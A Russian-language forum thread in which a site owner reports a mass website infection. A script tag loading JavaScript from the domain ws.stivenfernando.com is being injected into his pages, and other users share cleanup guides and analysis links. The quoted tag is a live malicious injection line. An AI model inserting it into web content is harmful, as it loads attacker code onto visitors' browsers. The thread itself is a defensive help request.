Новая тема   Ответить

 xurl
Всем привет.У меня в последнее время ломает кто-то все сайты выключенные включенные.Прописывается такой скрипт к началу документов
<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>

Причем не важно какой cms.Такое ощущение,что кто-то лазит по www как дома у себя.В интернете инфы мало пока, но нашел такую ссылку,там ссылка на оригинальный код и расшифрованный.Я не понимаю что там написано подскажите где эта гадость сидит, почему то подозрения на хостера.
https://malwaredecoder.com/result/f216a5ead4d9fabbc2c0e420fdeee2e7
Спалил просто сайты грузятся по 1-5 минут давая не хилую нагрузу .После второго бэкапа опять такая же хрень началась через 2 дня.

 FoxCloud
Вот тут рекомендации:

https://ru.foxcloud.net/kb/otvety-na-voprosy-polzovatelej/chto-delat…-sajta.php

 xurl
FoxCloud: Оч спасибо.Серьезные рекомендации, особенно с изменением кода на емайл, обязательно надо попробовать.Я сейчас оставил один сайт перенесу его на другой сервер.А с остальными буду разбираться.

 Ecchi
xurl: это совсем свежий вирь, даже на вордпресе топик снесли, наверно пока сами не разберуться
https://webcache.googleusercontent.com/search?q=cache:x4WDQDd2sOYJ:h…t=netscape

 xurl
Ecchi:
Ecchi писал:

Да я видел на фрилансах за 2 дня много заказов на удаление.Я снес 10 сайтов ,оставил 3 перспективных.Но отключил, вирусня везде, сегодня продолжу чистить.Я что вытравлю куски кодов скину сюда, может кому пригодится.Работы много.Он залез через вордпресс, а заразил все сайты, даже отключенные.

 Jet D.
https://guides.magefix.com/2020/04/ws-stivenfernando-com-fanta-js/
https://twitter.com/unmaskparasites/status/1250469460617637891

Проблема массовая, но большинство антивирей и малварных BLов до сих пор спят - https://www.urlvoid.com/scan/stivenfernando.com/